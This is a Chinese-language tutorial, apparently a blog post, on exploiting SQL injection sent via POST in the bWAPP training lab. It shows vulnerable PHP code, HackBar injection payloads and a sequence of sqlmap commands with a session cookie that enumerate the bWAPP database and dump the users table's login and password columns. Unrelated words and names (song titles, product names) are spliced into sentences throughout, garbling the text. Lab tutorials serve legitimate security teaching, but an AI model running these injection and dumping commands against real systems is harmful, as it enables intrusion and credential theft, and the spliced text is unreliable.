【视频】| bWAPP之SQL injection(POST)low等级 教程03-极客方舟搭错车主题曲

相信通过上一次的教程大家已经对SQL注入有一定的了解了吧。上一次的教程中页面的提交方法是GET方式梁祝吉他谱,这一次我们来学另一种提交方式POST方式。
想了解GET和POST请求的看这:
教程01 | bWAPP之HTML注入篇
了解SQL注入的方法看这:
教程02 | bWAPP之SQL injection(GET)--low等级实验机IP
118.89.17.134
实验题目
SQL Injection (POST/Search)&SQL Injection (POST/Select)
post请求方式
实验内容
0x01:SQL Injection (POST/Search)

和之前是一样的页面,只是后台的请求方式不一样而已g7057 。
0x02:后台源码分析
<?phpif(isset($_POST["title"])){ $title = $_POST["title"]; $sql = "SELECT * FROM movies WHERe title LIKE '%" . sqli($title) . "%'"; $recordset = mysql_query($sql, $link); if(!$recordset) { // die("Error: " . mysql_error());?>
和之前的没什么改变,只是改用POST请求方式而已。
0x03:测试漏洞
测试方法还是这两个:
'(英文符的单引号)报错测试大法and和or测试大法
发现和原来get请求方式存在的漏洞是一样的,只是我们在浏览器的地址栏看到我们输入的信息而已齐良末。所以戴呐,接下的步骤和上一节教程的内容是一样的,在这里就不累述了,请自行测试分析。
0x04:参考教程02,自行完成

1x01:SQL Injection (POST/Select)

还是原来的页面,岩崎峰子 不过改成POST请求之后,我们就会发现暗黑3牧牛杖 ,无论我们选择那个movie的名称,在地址栏上都不会有之前GET请求方法中那样出现变量名出来。
都只是这样:
http://118.89.17.134/sqli_13.php
这个时候烟斗村 ,我们就需要借用一些其他的小工具--HackBar窦仙童 。
我们需要用到火狐浏览器:

打开火狐浏览器,点击右上角的三条杠的按钮,然后点击附加组件

选择获取附加组件魔幻仙境,然后看看更多附加组件

搜索HackBar

我们选择这个进行安装下载

点击 Add For Firefox安装即可

安装完成需要重启一下浏览器。
安装完之后,我们回到这个题的页面,然后按F12键,就会出来这个:

我们就可以看到,下边那个菜单栏出现了HackBar的图标出来了。
点击HackBar集邮门户网,就会出现这个:

点击Load URL,就会获取这个页面的网址

勾选下面的Post data

我们就可以在Post Data框内输入信息进行SQL注入了。
在post data 框内输入:
movie=2&action=go
movie是选择框的变量名蓝小依,
action是go按钮的变量名。


输入完成后,点击Execute按钮

我们就可以发现页面变了,出来的是iron man的信息

1x02:漏洞测试
post data 框内在2后面加单引号
movie=2'&action=go

点击EXecute按钮,发现报错了

说明存在SQL注入漏洞,我们可以在Post Data框输入代码进行SQL注入了
1x03:漏洞利用
参考教程02即可,也不再累述。

彩蛋
2x01:sqlmap注入工具使用
是不是觉得这样子手工注入很麻烦,一步又一步地重复操作,还要记住一大堆英文和信息。
有没有很好的工具帮我们快速地完成这些工作呢?
答案肯定就是有的,为了方便,伟大的程序员和黑阔大佬们就写出了很多工具,其中被称之为SQL注入神器的就是sqlmap这款工具。
接下来,请看视频教程:
2x02:利用sqlmap注入get方式SQL注入漏洞
我们在此之前先装安装好工具,可以用pentestbox或者kali linux

2x03:命令解析
sqlmap -u "http://118.89.17.134/sqli_1.php?title=e&action=search" -p title --cookie="PHPSESSID=88kbuq62gim7q3q0enjit007s7;security_level=0"
sqlmap:就是调用我们的工具sqlmap了
-u:这个参数,指定目标URL
-p:指定存在注入漏洞的变量,这里是title
--cookie:因为我们需要登录才可以做实验,所以我们要在登录状态下才可以利用sqlmap进行注入。因此,伊利女士奶粉 我们用cookie这个参数来放我们登陆状态代码,表示已登录的意思。
然后,回车,sqlmap就会自动进行测试。
sqlmap -u "http://118.89.17.134/sqli_1.php?title=e&action=search" -p title --cookie="PHPSESSID=88kbuq62gim7q3q0enjit007s7;security_level=0" --current-db
按上箭头会把我们之前输入的信息显示出来。
--current-db:表示查询当前数据库的名称
sqlmap -u "http://118.89.17.134/sqli_1.php?title=e&action=search" -p title --cookie="PHPSESSID=88kbuq62gim7q3q0enjit007s7;security_level=0" --tables -D bWAPP
在上一步,我们已经知道当前数据库名称为bWAPP
-D bWAPP:指定要进行注入的数据库
--tables:查询这个数据库有多少个表
sqlmap -u "http://118.89.17.134/sqli_1.php?title=e&action=search" -p title --cookie="PHPSESSID=88kbuq62gim7q3q0enjit007s7;security_level=0" --columns -T users -D bWAPP
-T users:表示我们要查的表是users
--columns:表示我们要查users的里所有列
sqlmap -u "http://118.89.17.134/sqli_1.php周六乐翻天 ?title=e&action=search" -p title --cookie="PHPSESSID=88kbuq62gim7q3q0enjit007s7;security_level=0" --dump -C login,password -T users -D bWAPP
-C login,password:表示我们要查这两个的列的信息
--dump:表示把这两个列的信息显示出来
完成。

3x01:利用sqlmap注入POST方式的SQL注入

3x02:操作分析
1、我们需要利用burpsuite工具进行抓包大嘴叉子,然后将HTTP头复制粘贴到一个post.txt 文本中。
2、利用sqlmap进行注入
sqlmap -r C:UsersShinelonDesktoppost.txt -p title
-r:指定可以注入的头部文件的地址
-p:指定注入变量
3、剩下的和之前的一样
完结
下期再见!